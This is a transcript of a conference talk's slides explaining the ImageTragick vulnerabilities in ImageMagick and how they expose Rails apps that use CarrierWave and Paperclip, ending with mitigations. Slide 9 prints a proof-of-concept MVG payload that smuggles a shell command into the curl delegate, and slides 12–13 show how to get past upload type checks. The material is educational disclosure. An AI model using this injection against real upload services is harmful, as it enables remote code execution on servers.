ImageTragick and Rails

Transcript

1. ImageTragick and Rails Gordon Chan @devgordon

2. What is ImageMagick? ImageMagick® is a so ware suite that

   allows you to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, JPEG-2000, GIF, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG. https://www.imagemagick.org

3. Image Manipulation Library PNG, JPG, GIF, SVG, PS, PDF, MPEG,

   MVG, and more

4. Magic Bytes ImageMagick identifies file type by its first few

   bytes # I m a g e M a g i c k / M a g i c k C o r e / m a g i c . c { " J P E G " , 0 , M a g i c P a t t e r n ( " \ 3 7 7 \ 3 3 0 \ 3 7 7 " ) } , { " G I F " , 0 , M a g i c P a t t e r n ( " G I F 8 " ) } , { " P N G " , 0 , M a g i c P a t t e r n ( " \ 2 1 1 P N G \ r \ n \ 0 3 2 \ n " ) } , { " S V G " , 1 , M a g i c P a t t e r n ( " ? X M L " ) } , { " M V G " , 0 , M a g i c P a t t e r n ( " p u s h g r a p h i c - c o n t e x t " ) } , Ignores file extensions $ i d e n t i f y r o s e . f o o r o s e . f o o J P E G 7 0 x 4 6 7 0 x 4 6 + 0 + 0 8 - b i t s R G B 2 . 3 6 K B 0 . 0 0 0 u 0 : 0 0 . 0 0 0

5. Coders and Delegates Coders support the reading and/or writing of

   an image format (e.g. JPEG) Delegates (external libraries) may be used to process files $ c o n v e r t - l i s t d e l e g a t e . . . b m p < = w d p " m v " % i " " % i . b m p " ; " J x r E n c A p p " - i " % i . b m p " - o " % o . j x r " ; m v " b l e n d e r = > " b l e n d e r " - b " % i " - F P N G - o " % o " " \ n " c o n v e r t " - c o n c a t e n a t e " % o * . p n g d o c = > " s o f f i c e " - - h e a d l e s s - - c o n v e r t - t o p d f - - o u t d i r ` d i r n a m e " % i " ` p d f < = > p s " g s " - q - d Q U I E T - d S A F E R - d B A T C H - d N O P A U S E - d N O P R O M P T - d M a x B i t m a p = m p e g = > " f f m p e g " - n o s t d i n - v - 1 - i " % i " - v f r a m e s % S - v c o d e c p a m - a n - f r a w h t t p s = > " c u r l " - s - k - L - o " % o " " h t t p s : % M " . . .

6. Delegates use system() Commands are executed in the host environment

   " c u r l " - s - k - L - o " % o " " h t t p s : % M " Parameters are substituted for values (e.g. file names, URLs) " c u r l " - s - k - L - o " / v a r / t m p / m a g i c k - 9 5 5 5 8 " " h t t p s : / / a . c o m / i m g . j p g "

7. Magick Vector Graphics (MVG) Describes 2D vector and mixed vector/raster

   graphics p u s h g r a p h i c - c o n t e x t v i e w b o x 0 0 6 2 4 3 6 9 a f f i n e 0 . 2 8 3 6 3 6 0 0 0 . 2 8 3 8 4 6 - 0 - 0 p u s h g r a p h i c - c o n t e x t p u s h g r a p h i c - c o n t e x t f i l l ' d a r k s l a t e b l u e ' s t r o k e ' b l u e ' s t r o k e - w i d t h 1 r e c t a n g l e 1 , 1 2 1 9 9 , 1 2 9 9 f i l l ' u r l ( h t t p s : / / e x a m p l e . c o m / i m g . j p g ) ' u r l ( ) will use the HTTPS delegate i.e c u r l " c u r l " - s - k - L - o " / v a r / t m p / m a g i c k 2 3 " " h t t p s : / / e x a m p l e . c o m / i m g . j p g "

8. ImageTragick Public disclosure on May 3, 2016 Collection of security

   vulnerabilities Remote code execution (RCE) File reading/moving/deletion Server-side request forgery (SSRF)

9. CVE-2016-3714 Insufficient character filtering leads to code execution # e

   x p l o i t . m v g p u s h g r a p h i c - c o n t e x t v i e w b o x 0 0 6 4 0 4 8 0 f i l l ' u r l ( h t t p s : / / e x a m p l e . c o m / i m g . j p g " ; e c h o h e l l o w o r l d " ) ' $ c o n v e r t e x p l o i t . m v g o u t . p n g h e l l o w o r l d HTTPS delegate " c u r l " - s - k - L - o " % o " " h t t p s : % M " # ' % M ' i s r e p l a c e d w i t h ' / / e x a m p l e . c o m / i m g . j p g " ; e c h o h e l l o w o r l d ' " c u r l " . . . " h t t p s : / / e x a m p l e . c o m / i m g . j p g " ; e c h o h e l l o w o r l d

10. Attack Vector Attacker uploads an image containing code they choose

    Image is processed with ImageMagick => code is executed

11. Ruby on Rails Ruby gems for file and image uploads

    - P a p e r c l i p and C a r r i e r W a v e Both depend on M i n i M a g i c k for processing images M i n i M a g i c k is a wrapper for ImageMagick

12. File Extensions Mean Nothing File name/extension and content-type whitelisting C

    a r r i e r W a v e believes what you tell it — no file inspection Remember — ImageMagick uses 'magic bytes' to identify file types, not file extensions ∴ C a r r i e r W a v e is vulnerable

13. Paperclip is Vulnerable P a p e r c l

    i p inspects files to check its content-type $ f i l e - b - - m i m e i m a g e . p n g i m a g e / p n g ; c h a r s e t = b i n a r y But it only looks at the first part of the content-type (i m a g e ) So we can present an SVG as a PNG $ f i l e - b - - m i m e s v g . p n g i m a g e / s v g + x m l ; c h a r s e t = u s - a s c i i SVGs can reference external images (!)

14. Demo - Rails Application Ruby 2.3.1 Rails 4.2.6 CarrierWave 0.11.2

    Paperclip 4.3.6 MiniMagick 4.5.1 Debian 'jessie' ImageMagick 8:6.8.9.9-5+deb8u1 Docker - gordonchan/imagetragick-rails Rails and Docker defaults https://github.com/gchan/imagetragick-rails

15. Code #1 c l a s s C a r

    r i e r W a v e I m a g e U p l o a d e r < C a r r i e r W a v e : : U p l o a d e r : : B a s e v e r s i o n : t h u m b { p r o c e s s r e s i z e _ t o _ f i l l : [ 2 0 0 , 2 0 0 ] } . . . d e f e x t e n s i o n _ w h i t e _ l i s t ; % w ( j p g j p e g g i f p n g ) ; e n d d e f c o n t e n t _ t y p e _ w h i t e l i s t ; [ / i m a g e \ / / ] ; e n d e n d

16. Code #2 c l a s s I m a

    g e < A c t i v e R e c o r d : : B a s e m o u n t _ u p l o a d e r : c a r r i e r _ w a v e _ i m a g e , C a r r i e r W a v e I m a g e U p l o a d e r h a s _ a t t a c h e d _ f i l e : p a p e r c l i p _ i m a g e , s t y l e s : { t h u m b : " 1 0 0 x 1 0 0 # " } v a l i d a t e s _ a t t a c h m e n t _ c o n t e n t _ t y p e : p a p e r c l i p _ i m a g e , c o n t e n t _ t y p e : [ " i m a g e / j p e g " , " i m a g e / p n g " ] v a l i d a t e s _ a t t a c h m e n t _ f i l e _ n a m e : p a p e r c l i p _ i m a g e , m a t c h e s : [ / p n g \ Z / , / j p e ? g \ Z / ]

17. Demo Time Remote code execution Remote access (reverse shell)

18. Mitigation Patches available for Debian (May 16) Ubuntu patches coming

    soon? (as at May 26) Disable vulnerable coders (policy.xml) Test magic bytes of untrusted files Consider ImageMagick alternatives Sandbox image processing (seccomp, SELinux) General server security

19. References and Sources https://www.imagetragick.com https://www.imagemagick.org https://blog.cloudflare.com/inside-imagetragick-the-real- payloads-being-used-to-hack-websites-2/ https://github.com/ImageTragick/PoCs https://github.com/thoughtbot/paperclip https://github.com/carrierwaveuploader/carrierwave

    https://github.com/ImageMagick/ImageMagick

20. Gordon Chan @devgordon blog.devgordon.com github.com/gchan